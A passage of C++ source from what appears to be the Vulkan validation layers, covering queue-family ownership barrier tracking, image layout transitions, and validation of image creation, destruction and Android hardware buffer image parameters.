"%s: in submitted command buffer %s acquiring ownership of %s (%s), from srcQueueFamilyIndex %" PRIu32 " to dstQueueFamilyIndex %" PRIu32 " has no matching release barrier queued for execution.", "vkQueueSubmit()", barrier_name, handle_name, report_data->FormatHandle(acquire.handle).c_str(), acquire.srcQueueFamilyIndex, acquire.dstQueueFamilyIndex); } skip |= ValidateAndUpdateQFOScoreboard(report_data, cb_state, "acquiring", acquire, &scoreboards->acquire); } return skip; } bool CoreChecks::ValidateQueuedQFOTransfers(GLOBAL_CB_NODE *cb_state, QFOTransferCBScoreboards<VkImageMemoryBarrier> *qfo_image_scoreboards, QFOTransferCBScoreboards<VkBufferMemoryBarrier> *qfo_buffer_scoreboards) { bool skip = false; skip |= ValidateQueuedQFOTransferBarriers<VkImageMemoryBarrier>(cb_state, qfo_image_scoreboards); skip |= ValidateQueuedQFOTransferBarriers<VkBufferMemoryBarrier>(cb_state, qfo_buffer_scoreboards); return skip; } template <typename Barrier> void CoreChecks::RecordQueuedQFOTransferBarriers(GLOBAL_CB_NODE *cb_state) { using BarrierRecord = QFOTransferBarrier<Barrier>; using TypeTag = typename BarrierRecord::Tag; const auto &cb_barriers = GetQFOBarrierSets(cb_state, TypeTag()); GlobalQFOTransferBarrierMap<Barrier> &global_release_barriers = GetGlobalQFOReleaseBarrierMap(TypeTag()); // Add release barriers from this submit to the global map for (const auto &release : cb_barriers.release) { // the global barrier list is mapped by resource handle to allow cleanup on resource destruction // NOTE: We're using [] because creation of a Set is a needed side effect for new handles global_release_barriers[release.handle].insert(release); } // Erase acquired barriers from this submit from the global map -- essentially marking releases as consumed for (const auto &acquire : cb_barriers.acquire) { // NOTE: We're not using [] because we don't want to create entries for missing releases auto set_it = global_release_barriers.find(acquire.handle); if (set_it != global_release_barriers.end()) { QFOTransferBarrierSet<Barrier> &set_for_handle = set_it->second; set_for_handle.erase(acquire); if (set_for_handle.size() == 0) { // Clean up empty sets global_release_barriers.erase(set_it); } } } } void CoreChecks::RecordQueuedQFOTransfers(GLOBAL_CB_NODE *cb_state) { RecordQueuedQFOTransferBarriers<VkImageMemoryBarrier>(cb_state); RecordQueuedQFOTransferBarriers<VkBufferMemoryBarrier>(cb_state); } // Avoid making the template globally visible by exporting the one instance of it we need. void CoreChecks::EraseQFOImageRelaseBarriers(const VkImage &image) { EraseQFOReleaseBarriers<VkImageMemoryBarrier>(image); } void CoreChecks::TransitionImageLayouts(GLOBAL_CB_NODE *cb_state, uint32_t memBarrierCount, const VkImageMemoryBarrier *pImgMemBarriers) { for (uint32_t i = 0; i < memBarrierCount; ++i) { auto mem_barrier = &pImgMemBarriers[i]; if (!mem_barrier) continue; // For ownership transfers, the barrier is specified twice; as a release // operation on the yielding queue family, and as an acquire operation // on the acquiring queue family. This barrier may also include a layout // transition, which occurs 'between' the two operations. For validation // purposes it doesn't seem important which side performs the layout // transition, but it must not be performed twice. We'll arbitrarily // choose to perform it as part of the acquire operation. if (IsReleaseOp(cb_state, mem_barrier)) { continue; } VkImageCreateInfo *image_create_info = &(GetImageState(mem_barrier->image)->createInfo); uint32_t level_count = ResolveRemainingLevels(&mem_barrier->subresourceRange, image_create_info->mipLevels); uint32_t layer_count = ResolveRemainingLayers(&mem_barrier->subresourceRange, image_create_info->arrayLayers); // Special case for 3D images with VK_IMAGE_CREATE_2D_ARRAY_COMPATIBLE_BIT_KHR flag bit, where <extent.depth> and // <arrayLayers> can potentially alias. When recording layout for the entire image, pre-emptively record layouts // for all (potential) layer sub_resources. if ((0 != (image_create_info->flags & VK_IMAGE_CREATE_2D_ARRAY_COMPATIBLE_BIT_KHR)) && (mem_barrier->subresourceRange.baseArrayLayer == 0) && (layer_count == 1)) { layer_count = image_create_info->extent.depth; // Treat each depth slice as a layer subresource } // For multiplanar formats, IMAGE_ASPECT_COLOR is equivalent to adding the aspect of the individual planes VkImageAspectFlags aspect_mask = mem_barrier->subresourceRange.aspectMask; if (GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion) { if (FormatIsMultiplane(image_create_info->format)) { if (aspect_mask & VK_IMAGE_ASPECT_COLOR_BIT) { aspect_mask &= ~VK_IMAGE_ASPECT_COLOR_BIT; aspect_mask |= (VK_IMAGE_ASPECT_PLANE_0_BIT | VK_IMAGE_ASPECT_PLANE_1_BIT); if (FormatPlaneCount(image_create_info->format) > 2) { aspect_mask |= VK_IMAGE_ASPECT_PLANE_2_BIT; } } } } for (uint32_t j = 0; j < level_count; j++) { uint32_t level = mem_barrier->subresourceRange.baseMipLevel + j; for (uint32_t k = 0; k < layer_count; k++) { uint32_t layer = mem_barrier->subresourceRange.baseArrayLayer + k; TransitionImageAspectLayout(cb_state, mem_barrier, level, layer, aspect_mask, VK_IMAGE_ASPECT_COLOR_BIT); TransitionImageAspectLayout(cb_state, mem_barrier, level, layer, aspect_mask, VK_IMAGE_ASPECT_DEPTH_BIT); TransitionImageAspectLayout(cb_state, mem_barrier, level, layer, aspect_mask, VK_IMAGE_ASPECT_STENCIL_BIT); TransitionImageAspectLayout(cb_state, mem_barrier, level, layer, aspect_mask, VK_IMAGE_ASPECT_METADATA_BIT); if (GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion) { TransitionImageAspectLayout(cb_state, mem_barrier, level, layer, aspect_mask, VK_IMAGE_ASPECT_PLANE_0_BIT_KHR); TransitionImageAspectLayout(cb_state, mem_barrier, level, layer, aspect_mask, VK_IMAGE_ASPECT_PLANE_1_BIT_KHR); TransitionImageAspectLayout(cb_state, mem_barrier, level, layer, aspect_mask, VK_IMAGE_ASPECT_PLANE_2_BIT_KHR); } } } } } bool CoreChecks::VerifyImageLayout(GLOBAL_CB_NODE const *cb_node, IMAGE_STATE *image_state, VkImageSubresourceLayers subLayers, VkImageLayout explicit_layout, VkImageLayout optimal_layout, const char *caller, const char *layout_invalid_msg_code, const char *layout_mismatch_msg_code, bool *error) { const auto image = image_state->image; bool skip = false; for (uint32_t i = 0; i < subLayers.layerCount; ++i) { uint32_t layer = i + subLayers.baseArrayLayer; VkImageSubresource sub = {subLayers.aspectMask, subLayers.mipLevel, layer}; IMAGE_CMD_BUF_LAYOUT_NODE node; if (FindCmdBufLayout(cb_node, image, sub, node)) { if (node.layout != explicit_layout) { *error = true; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), layout_mismatch_msg_code, "%s: Cannot use image %s (layer=%u mip=%u) with specific layout %s that doesn't match the actual " "current layout %s.", caller, report_data->FormatHandle(image).c_str(), layer, subLayers.mipLevel, string_VkImageLayout(explicit_layout), string_VkImageLayout(node.layout)); } } } // If optimal_layout is not UNDEFINED, check that layout matches optimal for this case if ((VK_IMAGE_LAYOUT_UNDEFINED != optimal_layout) && (explicit_layout != optimal_layout)) { if (VK_IMAGE_LAYOUT_GENERAL == explicit_layout) { if (image_state->createInfo.tiling != VK_IMAGE_TILING_LINEAR) { // LAYOUT_GENERAL is allowed, but may not be performance optimal, flag as perf warning. skip |= log_msg(report_data, VK_DEBUG_REPORT_PERFORMANCE_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), kVUID_Core_DrawState_InvalidImageLayout, "%s: For optimal performance image %s layout should be %s instead of GENERAL.", caller, report_data->FormatHandle(image).c_str(), string_VkImageLayout(optimal_layout)); } } else if (GetDeviceExtensions()->vk_khr_shared_presentable_image) { if (image_state->shared_presentable) { if (VK_IMAGE_LAYOUT_SHARED_PRESENT_KHR != explicit_layout) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, layout_invalid_msg_code, "Layout for shared presentable image is %s but must be VK_IMAGE_LAYOUT_SHARED_PRESENT_KHR.", string_VkImageLayout(optimal_layout)); } } } else { *error = true; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), layout_invalid_msg_code, "%s: Layout for image %s is %s but can only be %s or VK_IMAGE_LAYOUT_GENERAL.", caller, report_data->FormatHandle(image).c_str(), string_VkImageLayout(explicit_layout), string_VkImageLayout(optimal_layout)); } } return skip; } void CoreChecks::TransitionFinalSubpassLayouts(GLOBAL_CB_NODE *pCB, const VkRenderPassBeginInfo *pRenderPassBegin, FRAMEBUFFER_STATE *framebuffer_state) { auto renderPass = GetRenderPassState(pRenderPassBegin->renderPass); if (!renderPass) return; const VkRenderPassCreateInfo2KHR *pRenderPassInfo = renderPass->createInfo.ptr(); if (framebuffer_state) { for (uint32_t i = 0; i < pRenderPassInfo->attachmentCount; ++i) { auto view_state = GetAttachmentImageViewState(framebuffer_state, i); if (view_state) { SetImageViewLayout(pCB, view_state, pRenderPassInfo->pAttachments[i].finalLayout); } } } } #ifdef VK_USE_PLATFORM_ANDROID_KHR // Android-specific validation that uses types defined only with VK_USE_PLATFORM_ANDROID_KHR // This could also move into a seperate core_validation_android.cpp file... ? // // AHB-specific validation within non-AHB APIs // bool CoreChecks::ValidateCreateImageANDROID(const debug_report_data *report_data, const VkImageCreateInfo *create_info) { bool skip = false; const VkExternalFormatANDROID *ext_fmt_android = lvl_find_in_chain<VkExternalFormatANDROID>(create_info->pNext); if (ext_fmt_android) { if (0 != ext_fmt_android->externalFormat) { if (VK_FORMAT_UNDEFINED != create_info->format) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-pNext-01974", "vkCreateImage(): VkImageCreateInfo struct has a chained VkExternalFormatANDROID struct with non-zero " "externalFormat, but the VkImageCreateInfo's format is not VK_FORMAT_UNDEFINED."); } if (0 != (VK_IMAGE_CREATE_MUTABLE_FORMAT_BIT & create_info->flags)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-pNext-02396", "vkCreateImage(): VkImageCreateInfo struct has a chained VkExternalFormatANDROID struct with " "non-zero externalFormat, but flags include VK_IMAGE_CREATE_MUTABLE_FORMAT_BIT."); } if (0 != (~VK_IMAGE_USAGE_SAMPLED_BIT & create_info->usage)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-pNext-02397", "vkCreateImage(): VkImageCreateInfo struct has a chained VkExternalFormatANDROID struct with " "non-zero externalFormat, but usage includes bits other than VK_IMAGE_USAGE_SAMPLED_BIT."); } if (VK_IMAGE_TILING_OPTIMAL != create_info->tiling) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-pNext-02398", "vkCreateImage(): VkImageCreateInfo struct has a chained VkExternalFormatANDROID struct with " "non-zero externalFormat, but layout is not VK_IMAGE_TILING_OPTIMAL."); } } auto ahb_formats = GetAHBExternalFormatsSet(); if ((0 != ext_fmt_android->externalFormat) && (0 == ahb_formats->count(ext_fmt_android->externalFormat))) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkExternalFormatANDROID-externalFormat-01894", "vkCreateImage(): Chained VkExternalFormatANDROID struct contains a non-zero externalFormat which has " "not been previously retrieved by vkGetAndroidHardwareBufferPropertiesANDROID()."); } } if ((nullptr == ext_fmt_android) || (0 == ext_fmt_android->externalFormat)) { if (VK_FORMAT_UNDEFINED == create_info->format) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-pNext-01975", "vkCreateImage(): VkImageCreateInfo struct's format is VK_FORMAT_UNDEFINED, but either does not have a " "chained VkExternalFormatANDROID struct or the struct exists but has an externalFormat of 0."); } } const VkExternalMemoryImageCreateInfo *emici = lvl_find_in_chain<VkExternalMemoryImageCreateInfo>(create_info->pNext); if (emici && (emici->handleTypes & VK_EXTERNAL_MEMORY_HANDLE_TYPE_ANDROID_HARDWARE_BUFFER_BIT_ANDROID)) { if (create_info->imageType != VK_IMAGE_TYPE_2D) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-pNext-02393", "vkCreateImage(): VkImageCreateInfo struct with imageType %s has chained VkExternalMemoryImageCreateInfo " "struct with handleType VK_EXTERNAL_MEMORY_HANDLE_TYPE_ANDROID_HARDWARE_BUFFER_BIT_ANDROID.", string_VkImageType(create_info->imageType)); } if ((create_info->mipLevels != 1) && (create_info->mipLevels != FullMipChainLevels(create_info->extent))) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-pNext-02394", "vkCreateImage(): VkImageCreateInfo struct with chained VkExternalMemoryImageCreateInfo struct of " "handleType VK_EXTERNAL_MEMORY_HANDLE_TYPE_ANDROID_HARDWARE_BUFFER_BIT_ANDROID " "specifies mipLevels = %" PRId32 " (full chain mipLevels are %" PRId32 ").", create_info->mipLevels, FullMipChainLevels(create_info->extent)); } } return skip; } void CoreChecks::RecordCreateImageANDROID(const VkImageCreateInfo *create_info, IMAGE_STATE *is_node) { const VkExternalMemoryImageCreateInfo *emici = lvl_find_in_chain<VkExternalMemoryImageCreateInfo>(create_info->pNext); if (emici && (emici->handleTypes & VK_EXTERNAL_MEMORY_HANDLE_TYPE_ANDROID_HARDWARE_BUFFER_BIT_ANDROID)) { is_node->imported_ahb = true; } const VkExternalFormatANDROID *ext_fmt_android = lvl_find_in_chain<VkExternalFormatANDROID>(create_info->pNext); if (ext_fmt_android && (0 != ext_fmt_android->externalFormat)) { is_node->has_ahb_format = true; is_node->ahb_format = ext_fmt_android->externalFormat; } } bool CoreChecks::ValidateCreateImageViewANDROID(const VkImageViewCreateInfo *create_info) { bool skip = false; IMAGE_STATE *image_state = GetImageState(create_info->image); if (image_state->has_ahb_format) { if (VK_FORMAT_UNDEFINED != create_info->format) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(create_info->image), "VUID-VkImageViewCreateInfo-image-02399", "vkCreateImageView(): VkImageViewCreateInfo struct has a chained VkExternalFormatANDROID struct, but " "format member is %s.", string_VkFormat(create_info->format)); } // Chain must include a compatible ycbcr conversion bool conv_found = false; uint64_t external_format = 0; const VkSamplerYcbcrConversionInfo *ycbcr_conv_info = lvl_find_in_chain<VkSamplerYcbcrConversionInfo>(create_info->pNext); if (ycbcr_conv_info != nullptr) { VkSamplerYcbcrConversion conv_handle = ycbcr_conv_info->conversion; auto fmap = GetYcbcrConversionFormatMap(); if (fmap->find(conv_handle) != fmap->end()) { conv_found = true; external_format = fmap->at(conv_handle); } } if ((!conv_found) || (external_format != image_state->ahb_format)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(create_info->image), "VUID-VkImageViewCreateInfo-image-02400", "vkCreateImageView(): VkImageViewCreateInfo struct has a chained VkExternalFormatANDROID struct, but " "without a chained VkSamplerYcbcrConversionInfo struct with the same external format."); } // Errors in create_info swizzles if ((create_info->components.r != VK_COMPONENT_SWIZZLE_IDENTITY) || (create_info->components.g != VK_COMPONENT_SWIZZLE_IDENTITY) || (create_info->components.b != VK_COMPONENT_SWIZZLE_IDENTITY) || (create_info->components.a != VK_COMPONENT_SWIZZLE_IDENTITY)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(create_info->image), "VUID-VkImageViewCreateInfo-image-02401", "vkCreateImageView(): VkImageViewCreateInfo struct has a chained VkExternalFormatANDROID struct, but " "includes one or more non-identity component swizzles."); } } return skip; } bool CoreChecks::ValidateGetImageSubresourceLayoutANDROID(const VkImage image) { bool skip = false; IMAGE_STATE *image_state = GetImageState(image); if (image_state->imported_ahb && (0 == image_state->GetBoundMemory().size())) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), "VUID-vkGetImageSubresourceLayout-image-01895", "vkGetImageSubresourceLayout(): Attempt to query layout from an image created with " "VK_EXTERNAL_MEMORY_HANDLE_TYPE_ANDROID_HARDWARE_BUFFER_BIT_ANDROID handleType which has not yet been " "bound to memory."); } return skip; } #else bool CoreChecks::ValidateCreateImageANDROID(const debug_report_data *report_data, const VkImageCreateInfo *create_info) { return false; } void CoreChecks::RecordCreateImageANDROID(const VkImageCreateInfo *create_info, IMAGE_STATE *is_node) {} bool CoreChecks::ValidateCreateImageViewANDROID(const VkImageViewCreateInfo *create_info) { return false; } bool CoreChecks::ValidateGetImageSubresourceLayoutANDROID(const VkImage image) { return false; } #endif // VK_USE_PLATFORM_ANDROID_KHR bool CoreChecks::PreCallValidateCreateImage(VkDevice device, const VkImageCreateInfo *pCreateInfo, const VkAllocationCallbacks *pAllocator, VkImage *pImage) { bool skip = false; if (GetDeviceExtensions()->vk_android_external_memory_android_hardware_buffer) { skip |= ValidateCreateImageANDROID(report_data, pCreateInfo); } else { // These checks are omitted or replaced when Android HW Buffer extension is active if (pCreateInfo->format == VK_FORMAT_UNDEFINED) { return log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-format-00943", "vkCreateImage(): VkFormat for image must not be VK_FORMAT_UNDEFINED."); } } if ((pCreateInfo->flags & VK_IMAGE_CREATE_CUBE_COMPATIBLE_BIT) && (VK_IMAGE_TYPE_2D != pCreateInfo->imageType)) { skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-flags-00949", "vkCreateImage(): Image type must be VK_IMAGE_TYPE_2D when VK_IMAGE_CREATE_CUBE_COMPATIBLE_BIT flag bit is set"); } const VkPhysicalDeviceLimits *device_limits = &(GetPDProperties()->limits); VkImageUsageFlags attach_flags = VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT | VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT | VK_IMAGE_USAGE_TRANSIENT_ATTACHMENT_BIT | VK_IMAGE_USAGE_INPUT_ATTACHMENT_BIT; if ((pCreateInfo->usage & attach_flags) && (pCreateInfo->extent.width > device_limits->maxFramebufferWidth)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-usage-00964", "vkCreateImage(): Image usage flags include a frame buffer attachment bit and image width exceeds device " "maxFramebufferWidth."); } if ((pCreateInfo->usage & attach_flags) && (pCreateInfo->extent.height > device_limits->maxFramebufferHeight)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-usage-00965", "vkCreateImage(): Image usage flags include a frame buffer attachment bit and image height exceeds device " "maxFramebufferHeight"); } VkImageFormatProperties format_limits = {}; VkResult res = GetPDImageFormatProperties(pCreateInfo, &format_limits); if (res == VK_ERROR_FORMAT_NOT_SUPPORTED) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUIDUndefined, "vkCreateImage(): Format %s is not supported for this combination of parameters.", string_VkFormat(pCreateInfo->format)); } else { if (pCreateInfo->mipLevels > format_limits.maxMipLevels) { const char *format_string = string_VkFormat(pCreateInfo->format); skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-mipLevels-02255", "vkCreateImage(): Image mip levels=%d exceed image format maxMipLevels=%d for format %s.", pCreateInfo->mipLevels, format_limits.maxMipLevels, format_string); } uint64_t texel_count = (uint64_t)pCreateInfo->extent.width * (uint64_t)pCreateInfo->extent.height * (uint64_t)pCreateInfo->extent.depth * (uint64_t)pCreateInfo->arrayLayers * (uint64_t)pCreateInfo->samples; uint64_t total_size = (uint64_t)std::ceil(FormatTexelSize(pCreateInfo->format) * texel_count); // Round up to imageGranularity boundary VkDeviceSize imageGranularity = GetPDProperties()->limits.bufferImageGranularity; uint64_t ig_mask = imageGranularity - 1; total_size = (total_size + ig_mask) & ~ig_mask; if (total_size > format_limits.maxResourceSize) { skip |= log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, 0, kVUID_Core_Image_InvalidFormatLimitsViolation, "vkCreateImage(): resource size exceeds allowable maximum Image resource size = 0x%" PRIxLEAST64 ", maximum resource size = 0x%" PRIxLEAST64 " ", total_size, format_limits.maxResourceSize); } if (pCreateInfo->arrayLayers > format_limits.maxArrayLayers) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, 0, "VUID-VkImageCreateInfo-arrayLayers-02256", "vkCreateImage(): arrayLayers=%d exceeds allowable maximum supported by format of %d.", pCreateInfo->arrayLayers, format_limits.maxArrayLayers); } if (GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion && FormatRequiresYcbcrConversion(pCreateInfo->format) && !GetDeviceExtensions()->vk_ext_ycbcr_image_arrays && pCreateInfo->arrayLayers > 1) { skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, 0, "VUID-VkImageCreateInfo-format-02653", "vkCreateImage(): arrayLayers=%d exceeds the maximum allowed of 1 for formats requiring sampler ycbcr conversion", pCreateInfo->arrayLayers); } if ((pCreateInfo->samples & format_limits.sampleCounts) == 0) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, 0, "VUID-VkImageCreateInfo-samples-02258", "vkCreateImage(): samples %s is not supported by format 0x%.8X.", string_VkSampleCountFlagBits(pCreateInfo->samples), format_limits.sampleCounts); } } if ((pCreateInfo->flags & VK_IMAGE_CREATE_SPARSE_ALIASED_BIT) && (!GetEnabledFeatures()->core.sparseResidencyAliased)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkImageCreateInfo-flags-01924", "vkCreateImage(): the sparseResidencyAliased device feature is disabled: Images cannot be created with the " "VK_IMAGE_CREATE_SPARSE_ALIASED_BIT set."); } if (GetDeviceExtensions()->vk_khr_maintenance2) { if (pCreateInfo->flags & VK_IMAGE_CREATE_BLOCK_TEXEL_VIEW_COMPATIBLE_BIT_KHR) { if (!(FormatIsCompressed_BC(pCreateInfo->format) || FormatIsCompressed_ASTC_LDR(pCreateInfo->format) || FormatIsCompressed_ETC2_EAC(pCreateInfo->format))) { // TODO: Add Maintenance2 VUID skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUIDUndefined, "vkCreateImage(): If pCreateInfo->flags contains VK_IMAGE_CREATE_BLOCK_TEXEL_VIEW_COMPATIBLE_BIT_KHR, " "format must be block, ETC or ASTC compressed, but is %s", string_VkFormat(pCreateInfo->format)); } if (!(pCreateInfo->flags & VK_IMAGE_CREATE_MUTABLE_FORMAT_BIT)) { // TODO: Add Maintenance2 VUID skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUIDUndefined, "vkCreateImage(): If pCreateInfo->flags contains VK_IMAGE_CREATE_BLOCK_TEXEL_VIEW_COMPATIBLE_BIT_KHR, " "flags must also contain VK_IMAGE_CREATE_MUTABLE_FORMAT_BIT."); } } } if (pCreateInfo->sharingMode == VK_SHARING_MODE_CONCURRENT && pCreateInfo->pQueueFamilyIndices) { skip |= ValidateQueueFamilies(pCreateInfo->queueFamilyIndexCount, pCreateInfo->pQueueFamilyIndices, "vkCreateImage", "pCreateInfo->pQueueFamilyIndices", "VUID-VkImageCreateInfo-sharingMode-01420", "VUID-VkImageCreateInfo-sharingMode-01420", false); } return skip; } void CoreChecks::PostCallRecordCreateImage(VkDevice device, const VkImageCreateInfo *pCreateInfo, const VkAllocationCallbacks *pAllocator, VkImage *pImage, VkResult result) { if (VK_SUCCESS != result) return; IMAGE_LAYOUT_NODE image_state; image_state.layout = pCreateInfo->initialLayout; image_state.format = pCreateInfo->format; IMAGE_STATE *is_node = new IMAGE_STATE(*pImage, pCreateInfo); if (GetDeviceExtensions()->vk_android_external_memory_android_hardware_buffer) { RecordCreateImageANDROID(pCreateInfo, is_node); } GetImageMap()->insert(std::make_pair(*pImage, std::unique_ptr<IMAGE_STATE>(is_node))); ImageSubresourcePair subpair{*pImage, false, VkImageSubresource()}; (*GetImageSubresourceMap())[*pImage].push_back(subpair); (*GetImageLayoutMap())[subpair] = image_state; (*GetImageLayoutMap())[subpair] = image_state; } bool CoreChecks::PreCallValidateDestroyImage(VkDevice device, VkImage image, const VkAllocationCallbacks *pAllocator) { IMAGE_STATE *image_state = GetImageState(image); const VK_OBJECT obj_struct = {HandleToUint64(image), kVulkanObjectTypeImage}; bool skip = false; if (image_state) { skip |= ValidateObjectNotInUse(image_state, obj_struct, "vkDestroyImage", "VUID-vkDestroyImage-image-01000"); } return skip; } void CoreChecks::PreCallRecordDestroyImage(VkDevice device, VkImage image, const VkAllocationCallbacks *pAllocator) { if (!image) return; IMAGE_STATE *image_state = GetImageState(image); VK_OBJECT obj_struct = {HandleToUint64(image), kVulkanObjectTypeImage}; InvalidateCommandBuffers(image_state->cb_bindings, obj_struct); // Clean up memory mapping, bindings and range references for image for (auto mem_binding : image_state->GetBoundMemory()) { auto mem_info = GetMemObjInfo(mem_binding); if (mem_info) { RemoveImageMemoryRange(obj_struct.handle, mem_info); } } ClearMemoryObjectBindings(obj_struct.handle, kVulkanObjectTypeImage); EraseQFOReleaseBarriers<VkImageMemoryBarrier>(image); // Remove image from imageMap GetImageMap()->erase(image); std::unordered_map<VkImage, std::vector<ImageSubresourcePair>> *imageSubresourceMap = GetImageSubresourceMap(); const auto &sub_entry = imageSubresourceMap->find(image); if (sub_entry != imageSubresourceMap->end()) { for (const auto &pair : sub_entry->second) { GetImageLayoutMap()->erase(pair); } imageSubresourceMap->erase(sub_entry); } } bool CoreChecks::ValidateImageAttributes(IMAGE_STATE *image_state, VkImageSubresourceRange range) { bool skip = false; if (range.aspectMask != VK_IMAGE_ASPECT_COLOR_BIT) { char const str[] = "vkCmdClearColorImage aspectMasks for all subresource ranges must be set to VK_IMAGE_ASPECT_COLOR_BIT"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), kVUID_Core_DrawState_InvalidImageAspect, str); } if (FormatIsDepthOrStencil(image_state->createInfo.format)) { char const str[] = "vkCmdClearColorImage called with depth/stencil image."; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), "VUID-vkCmdClearColorImage-image-00007", "%s.", str); } else if (FormatIsCompressed(image_state->createInfo.format)) { char const str[] = "vkCmdClearColorImage called with compressed image."; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), "VUID-vkCmdClearColorImage-image-00007", "%s.", str); } if (!(image_state->createInfo.usage & VK_IMAGE_USAGE_TRANSFER_DST_BIT)) { char const str[] = "vkCmdClearColorImage called with image created without VK_IMAGE_USAGE_TRANSFER_DST_BIT."; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), "VUID-vkCmdClearColorImage-image-00002", "%s.", str); } return skip; } uint32_t ResolveRemainingLevels(const VkImageSubresourceRange *range, uint32_t mip_levels) { // Return correct number of mip levels taking into account VK_REMAINING_MIP_LEVELS uint32_t mip_level_count = range->levelCount; if (range->levelCount == VK_REMAINING_MIP_LEVELS) { mip_level_count = mip_levels - range->baseMipLevel; } return mip_level_count; } uint32_t ResolveRemainingLayers(const VkImageSubresourceRange *range, uint32_t layers) { // 